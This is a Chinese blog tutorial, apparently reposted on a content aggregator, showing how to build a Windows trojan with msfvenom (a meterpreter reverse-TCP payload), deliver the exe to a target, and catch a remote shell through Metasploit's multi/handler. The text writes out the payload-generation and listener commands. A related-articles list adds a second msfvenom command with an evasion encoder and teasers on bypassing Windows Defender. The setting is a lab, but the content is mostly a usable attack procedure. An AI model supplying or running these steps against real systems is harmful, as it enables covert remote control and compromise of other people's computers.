msfconsole之制作windows木马并成功获取shell

这篇具有很好参考价值的文章主要介绍了msfconsole之制作windows木马并成功获取shell。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

msfconsole之制作windows木马并成功获取shell


一、工具简介
    msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如nmap、sqlmap等,可以直接在msfconsole里面使用。

二、复现过程
    攻击机:kali-2021-09 IP地址:192.168.227.128
    靶机:windows12-server IP地址:192.168.227.131

(1)首先打开kali终端,输入msfconsole进入msf:
msfconsole之制作windows木马并成功获取shell

(2)通过msfvenom生成可以在windows系统运行的exe后缀病毒:
    msfvenom -p windows/meterpreter_reverse_tcp LHOST=vps ip LPORT=12345 -f exe > win2012.exe
msfconsole之制作windows木马并成功获取shell

(3)在kali上利用python开启一个8080服务,将exe文件传到靶机上:(此处不做演示)
msfconsole之制作windows木马并成功获取shell

(4)然后回到kali机上,需要开启端口监听,先使用监听模块:Use exploit/multi/handler
msfconsole之制作windows木马并成功获取shell

(5)然后设置payload反弹:Set payload windows/meterpreter_reverse_tcp
msfconsole之制作windows木马并成功获取shell

(6)通过show options看看需要设置哪些攻击参数,required中显示为yes的则是必须设置的参数:
msfconsole之制作windows木马并成功获取shell
    此处需要设置监听ip和端口号,通过以下命令行:
    set LHOST 192.168.227.128(攻击者终端ip)
    set LPORT 12345(攻击者终端监听的端口)
msfconsole之制作windows木马并成功获取shell

(7)然后输入exploit/run开始监听:
msfconsole之制作windows木马并成功获取shell
    回到windows2012中,点击win2012.exe运行此木马,此时kali可以成功收到shell,进入meterpreter:
msfconsole之制作windows木马并成功获取shell
    此时输入shell即可进入shell控制台模式,但是我们会发现编码问题导致显示出问题:
msfconsole之制作windows木马并成功获取shell
    输入chcp 65001即可解决编码错误问题,显示正常:
msfconsole之制作windows木马并成功获取shell文章来源地址https://www.toymoban.com/news/detail-401904.html

到了这里,关于msfconsole之制作windows木马并成功获取shell的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 木马病毒制作及分析

    实验目的 本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容: (1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击; (2) 利用网络安全工具或设备对入侵与攻击进行检测; 【 注意事项 】 1. 本病毒程序用

    2024年02月07日
    浏览(39)
  • msf渗透练习-生成木马控制window系统

    说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽) (一)生成木马 命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.46 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5 -p:设置payload,也就是要生成的可执行文件的类型和功能,这里选择的是Windows Meterpreter反向

    2024年02月08日
    浏览(39)
  • Kali linux windows木马(外网) 保姆级教学

    前言 实现外网控制需要一个外网的IP负责监听,本次使用的是https://www.fgnwct.com(飞鸽内网穿透)有免费的隧道 kali.org(kali官网) 详细教程查询官网。 此系列仅用于工作和学习,禁止用于非法攻击。一切遵守《网络安全法》 环境 windows7 kali linux 2021 下载客户端,解压出文件 \\\'\\\'

    2023年04月26日
    浏览(36)
  • APT之木马动态免杀绕过Windows Defender

    c++编译环境 一串简单的将shellcode加载入windows内存执行的c++代码 payload变量里存储的就是我们的shellcode 代码: 作用: 代码: 作用: 代码: 解释: 代码: 作用: 代码: 作用: 代码: 作用: 代码: 作用: 这就是一个简单的将shellcode加载进windows内存里执行的程序代码 如果

    2024年02月12日
    浏览(39)
  • 组装机装系统,在另一个电脑只有ubuntu系统的情况下用ventoy制作Windows启动盘并且成功安装,后续如何安装win+ubuntu双系统(安装ubuntu后可能出现的wifi不能用的解决方法)

    第一步 下载ventoy 1.下载linux版本的ventoy 2.安装Windows镜像,自己找 3.下载得到的是压缩包ventoy-1.0.76-linux.tar.gz 下载得到的压缩包所在的位置要记住,一般下载好文件可能会进入Downloads文件夹(我的是进入的Downloads,不用移动位置,后面会用到) 4.解压 快捷键ctrl+alt+T打开终端

    2024年02月10日
    浏览(46)
  • ihateniggers:针对Python开发者的Windows远控木马分析

    墨菲安全实验室在持续监测开源软件仓库中的投毒行为,5 月 9 日起发现 4 个包含 “ihateniggers” 远程控制木马的 Python 包被 nagogy@gmail.com 邮箱关联的账号发布到 PyPI 仓库,试图针对Windows系统下 Python 开发者进行攻击。木马利用了discord、replit、playit 等多个平台托管后门、隐藏

    2024年02月07日
    浏览(40)
  • 【脚本项目源码】Python制作提升成功率90%的表白神器

    明天就是拥抱情人节,情侣们会在公开的场合拥抱,向世人宣告你俩的爱意,也让这个寒冷的冬天变得格外温馨。到了年底依然能热情拥抱,也见证了两人情意如昔。 今天小鱼就给大家带来就是的利用Python制作表白神器,记得发给自己的心仪对象。废话不多说直接开整~ Pyt

    2023年04月09日
    浏览(41)
  • 【系统安装】ubuntu20.04启动盘制作,正经教程,小白安装教程,百分百成功安装

    1.所需材料: 64GBU盘(其实8g和16g也可以) 2.制作U盘启动盘 使用windows制作ubuntu 20.04启动盘 1)下载制作工具:Rufus:Rufus - 轻松创建 USB 启动盘 2)插入用来做启动盘的U盘 3)打开Rufus,选择镜像文件,并开始,注意target system选择UEFI 4)写入过程大概会持续4~5分钟 3.启动盘制作

    2024年02月05日
    浏览(56)
  • Splunk 成功获取 MS Azure AD 数据

    1: 背景: 最近客户的Azure AD 的数据在splunk 数据获取失败,我来trouble shooting 发现是splunk 和Azure AD 直接的连接出了问题,正好来回顾一下这个case: 通过Splunk 的日志查找: index=_internal, host=ABC, failed, 就可以看到取Azure AD  的密码报错。 2: 解决问题: 2.1: 先到Splunk 上获取这个Az

    2024年02月13日
    浏览(40)
  • Windows下安装Hive(包安装成功)

    本篇 Hadoop版本为:2.7.2 Hive版本为:2.3.5 请严格按照版本来安装。 Hive是基于Hadoop构建的一套数据仓库分析系统,它提供了丰富的SQL查询方式来分析存储在Hadoop分布式文件系统中的数据:可以将结构化的数据文件映射为一张数据库表,并提供完整的SQL查询功能;可以将SQL语句转

    2024年02月14日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包